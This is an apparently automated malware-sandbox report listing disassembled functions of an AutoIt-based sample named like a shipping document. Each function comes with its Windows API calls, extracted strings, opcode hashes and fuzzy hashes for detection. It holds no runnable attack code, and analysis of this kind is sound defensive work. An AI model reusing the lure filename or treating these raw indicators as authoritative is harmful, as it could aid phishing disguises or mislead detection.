Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d22fcd991a5fd5fa150ab32669b111b4b93b92d5bf85d8a5a47d7befe4771f5a
Instruction ID: ca46e40ff4da8d02c039de287e439f9910f28ce1b580e82cd0d44fa3fa854ec1
Opcode Fuzzy Hash: d22fcd991a5fd5fa150ab32669b111b4b93b92d5bf85d8a5a47d7befe4771f5a
Instruction Fuzzy Hash: D13193316007049BEB25DF99DC45FFEBBFAEF45350F14401DE986A62A0D778AA84DB10

Function 006D658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 006D6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 006D65FA
, $, xrefs: 006D6648

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 9fcf90bed23ec86ddc6b8a0bd1f9fe93f90d94927a894c3f22d3f65d2de77d28
Instruction ID: 0f02b16a4dc19606c519be01e352efaa1cc162f120c496938f4b3d7cbe62af70
Opcode Fuzzy Hash: 9fcf90bed23ec86ddc6b8a0bd1f9fe93f90d94927a894c3f22d3f65d2de77d28
Instruction Fuzzy Hash: CE217571A00118AFCF50EF64CC81EEE77B6AF45740F00055EF505AB292DB74EA45CBA6

Function 006E93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006E945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006E9467

Strings

Combobox, xrefs: 006E9429

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: ba1e575beea7d8e55bec3ecb598565aa232913e78c502059da960c7a2bbefca0
Instruction ID: a3e26f80182fce49c1c5ec256c0c9b586223e7c06b6aaaf8a538c85cf6b23426
Opcode Fuzzy Hash: ba1e575beea7d8e55bec3ecb598565aa232913e78c502059da960c7a2bbefca0
Instruction Fuzzy Hash: 401190B1211348AFEF219E55DC80EEB37AFEF483A4F104129F918972E0D6359C528774

Function 006EDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

GetActiveWindow.USER32 ref: 006EDA7B
EnumChildWindows.USER32(?,006ED75F,00000000), ref: 006EDAF5

Strings

T1m, xrefs: 006EDAFB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1m
API String ID: 3814560230-1638548777
Opcode ID: 5d17fe0f5129ef8f5c10731c267096d17341b9e4dab6d2852f1b63fc7cfc00c7
Instruction ID: b36bd4ddeb28cae5732d1985541f772995327d9e6d5ac06d9ce6be3a2936628e
Opcode Fuzzy Hash: 5d17fe0f5129ef8f5c10731c267096d17341b9e4dab6d2852f1b63fc7cfc00c7
Instruction Fuzzy Hash: 93213D79205301DFCB14EF29E850AA673EAEB4A320F66461DE969873E0DB35A840CB55

Function 006E98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0069D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0069D1BA
Part of subcall function 0069D17C: GetStockObject.GDI32(00000011), ref: 0069D1CE
Part of subcall function 0069D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0069D1D8

GetWindowRect.USER32(00000000,?), ref: 006E9968
GetSysColor.USER32(00000012), ref: 006E9982

Strings

static, xrefs: 006E9945

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: b35998bb5fec0ce8d860659a378f4e9ef2f93ccfae468b0ac74c7e6c4062feeb
Instruction ID: be4d40a419f9f3e24c28d801e3ece851d1145e64a1293765420f412339f8f083
Opcode Fuzzy Hash: b35998bb5fec0ce8d860659a378f4e9ef2f93ccfae468b0ac74c7e6c4062feeb
Instruction Fuzzy Hash: 8A119772520209AFDB04DFB8CC45AEA7BA9FF08304F044628F955E3251E735E850CB60

Function 006E9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006E9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006E96A8

Strings

edit, xrefs: 006E967D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c24a8715a6a1289167b78475066d08d18182b761efd035118427d2e0431d2f85
Instruction ID: 97abc2953add658e38df3adbdabe3b8c18743059f61d1d9d58995b4a6fc2fc12
Opcode Fuzzy Hash: c24a8715a6a1289167b78475066d08d18182b761efd035118427d2e0431d2f85
Instruction Fuzzy Hash: 89119A71102248ABFF209FA5DC44AEB3B6AEF053A8F104316F924972E0C736DC919B64

Function 006C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006C52F4

Strings

0, xrefs: 006C52CE

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 6a4f3c2ade45af39d47efd5e64d1bc00f58bc29a92394e9eda1fc0cfdc4b1333
Instruction ID: 780e4ae6ea0f4927e5476eef17ed75880797ce2e3ac843c10283da0fa18e8ba0
Opcode Fuzzy Hash: 6a4f3c2ade45af39d47efd5e64d1bc00f58bc29a92394e9eda1fc0cfdc4b1333
Instruction Fuzzy Hash: AE11D676A01694EBDB10EA98DD04FF977EADB45750F04001AE947E7290E374BE84C791

Function 006D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006D4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006D4E1E

Strings

<local>, xrefs: 006D4DE6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 69f80f7f03cf05cb2aacbed4089c5df5cb29ddd5a39672e7812a177f6cc1c4bf
Instruction ID: 79f48cee4fe7bc5d948b218e0e174262b95b9955f58334b0b0d5c6c7e4497d66
Opcode Fuzzy Hash: 69f80f7f03cf05cb2aacbed4089c5df5cb29ddd5a39672e7812a177f6cc1c4bf
Instruction Fuzzy Hash: 85119E70901221FBDB258B918889EEBFBAAFF06754F10822BF50596240DB705D41C6E0

Function 006AA70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006B37A7
___raise_securityfailure.LIBCMT ref: 006B388E

Strings

(t, xrefs: 006B3889

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (t
API String ID: 3761405300-735642914
Opcode ID: 1cda95d69fe516fe533065dda283556d30af56055f2364df80be021f53e97c84
Instruction ID: 3b3afffaef000108a3d1b03f1834a179c62bfd7b631249fee393546b5b9eda15
Opcode Fuzzy Hash: 1cda95d69fe516fe533065dda283556d30af56055f2364df80be021f53e97c84
Instruction Fuzzy Hash: 0A2107F8610224DBD740EF65E9956403BB1BB4A310F10D82FEA048A3A1E3B859A5CFCD

Function 006DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 006DA84E
htons.WSOCK32(00000000,?,00000000), ref: 006DA88B

Strings

255.255.255.255, xrefs: 006DA866

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 31fe7834b9f3283b3a6832cf62506aee39f18cd9b5adbd0d4c92d858a6d23a7f
Instruction ID: 7c291b168a358961972c4d765a21b83327f1652959b43e72e94db3900bf58310
Opcode Fuzzy Hash: 31fe7834b9f3283b3a6832cf62506aee39f18cd9b5adbd0d4c92d858a6d23a7f
Instruction Fuzzy Hash: 2B012675A04304ABCB209FA8C856FE9B366EF04324F10852BF9159B3D1C731E8019756

Function 006BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006BB7EF

Strings

ComboBox, xrefs: 006BB78B
ListBox, xrefs: 006BB7B9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: b046ec7df6d72780d8d125ab168a9158384bcb11a03c5dbcbf22d4f56a0eb5a8
Instruction ID: 9fd3dded585b7a97b3c4a62f664490f740c9f46a6b8803dbb812d3745d48364e
Opcode Fuzzy Hash: b046ec7df6d72780d8d125ab168a9158384bcb11a03c5dbcbf22d4f56a0eb5a8
Instruction Fuzzy Hash: 770124B1601114ABCB44FBA8CC529FE33AABF05360B00071DF462672C2EFB4580887A8

Function 006BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 006BB6EB

Strings

ComboBox, xrefs: 006BB687
ListBox, xrefs: 006BB6B5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 9f842e70a2d125eeb4379b927a73e008bf6089e86ca73c3a80b35aeee174fb95
Instruction ID: e7899a5447605ad444b21bf13f241987369de7c1ea9c41cfe25dba772c8188c3
Opcode Fuzzy Hash: 9f842e70a2d125eeb4379b927a73e008bf6089e86ca73c3a80b35aeee174fb95
Instruction Fuzzy Hash: 8101A2B5641104ABDB54FBA4C953AFE73AA9F05344F10012DB502B72C2EBA45E1987B9

Function 006BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 006BB76C

Strings

ComboBox, xrefs: 006BB70A
ListBox, xrefs: 006BB738

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 6edcf6c2ee0a451c16d5f10f6669b1da4f98ccaa7abfcc69d061bafb7bc0ddbb
Instruction ID: 797bd4fe54744b1a5c6df8174a99103a8506e2c6dfc4c9484450798a9f962bd6
Opcode Fuzzy Hash: 6edcf6c2ee0a451c16d5f10f6669b1da4f98ccaa7abfcc69d061bafb7bc0ddbb
Instruction Fuzzy Hash: 5001D6F5640104ABDB50FBA4C902EFE73AE9F05344F10012DB402B32D2EFA45E4A87B9

Function 006A4D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 006A4D9E
__calloc_crt.LIBCMT ref: 006A4DB7

Strings

"t, xrefs: 006A4DCE

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __calloc_crt
String ID: "t
API String ID: 3494438863-350971801
Opcode ID: d7225ef293d3c6e728e0d0cf51888f9602e4b503f61a8f26ae77c65a1ffa2ba2
Instruction ID: 6b1a2d92abdb0cdb3bb9fd865e91587cb2b0c2a987aad87ec5fe05f5070f5f25
Opcode Fuzzy Hash: d7225ef293d3c6e728e0d0cf51888f9602e4b503f61a8f26ae77c65a1ffa2ba2
Instruction Fuzzy Hash: 83F0A9712096029AE714BF19BC516A667D6FF47710F15411FF100CA256EBF4CC424E58

Function 00684024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00680000,00000063,00000001,00000010,00000010,00000000), ref: 00684048
EnumResourceNamesW.KERNEL32(00000000,0000000E,006C67E9,00000063,00000000,76950280,?,?,00683EE1,?,?,000000FF), ref: 006F41B3

Strings

>h, xrefs: 00684028

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >h
API String ID: 1578290342-3869075083
Opcode ID: ccf72dad56fe19032ebf0243acbab2a3539fdfc05595f0d5c20a7bb400f84346
Instruction ID: 809f48f09ae8b1fdbdd8716356aa56b9096d494f34be951193144f6c853c6ce3
Opcode Fuzzy Hash: ccf72dad56fe19032ebf0243acbab2a3539fdfc05595f0d5c20a7bb400f84346
Instruction Fuzzy Hash: 52F06235640315B7D230AB15FC4AFE33F59E716BB5F508607F614961E0D7E894C08798

Function 006C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006C7762
_wcscmp.LIBCMT ref: 006C7774

Strings

#32770, xrefs: 006C776E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: e1fbcbbe60462ba9e11049e986137ac42dc4ea725f5b4cef50c6484ac82cd2ab
Instruction ID: 614cf6484f9720202346896b07f31f8d4a8e1e6443ccc30d81ad1c38900ddd90
Opcode Fuzzy Hash: e1fbcbbe60462ba9e11049e986137ac42dc4ea725f5b4cef50c6484ac82cd2ab
Instruction Fuzzy Hash: ACE09B7760432467D720AAE5DC05E97FBACE752764F00411AB505D7141D6649A0187D4

Function 006BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006BA63F

Part of subcall function 006A13F1: _doexit.LIBCMT ref: 006A13FB

Strings

Error allocating memory., xrefs: 006BA638
AutoIt, xrefs: 006BA633

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f7ac68a038939edc7ae9eb2fa28d796a15face76788562deecb4e6eb4dfaef3f
Instruction ID: c41e41057163e0b9769ce89109fcd404babfd35c9da376becf48aa4c164f250c
Opcode Fuzzy Hash: f7ac68a038939edc7ae9eb2fa28d796a15face76788562deecb4e6eb4dfaef3f
Instruction Fuzzy Hash: F2D0127128432833D66436987C17FC566498B15B95F054019BB09A95C259D7998042DD

Function 006FAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 006FACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 006FAEBD

Strings

WIN_XPe, xrefs: 006FACD3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 099b4bbc6b1dd299d26038d74b27d02f4e08c42f6d0dd5a0ad6d2ba0323cf8cb
Instruction ID: 8eb4d4ab0de6a23f06e4ca6d17a240e2d72c06a10ebf5a42c22973593ea942c0
Opcode Fuzzy Hash: 099b4bbc6b1dd299d26038d74b27d02f4e08c42f6d0dd5a0ad6d2ba0323cf8cb
Instruction Fuzzy Hash: A0E06DB0C0024DDFCB12DBE4D9849FCF7BAAB48300F10C086E256B2260CB305A85DF26

Function 006E86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006E86E2
PostMessageW.USER32(00000000), ref: 006E86E9

Part of subcall function 006C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006C7AD0

Strings

Shell_TrayWnd, xrefs: 006E86DB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
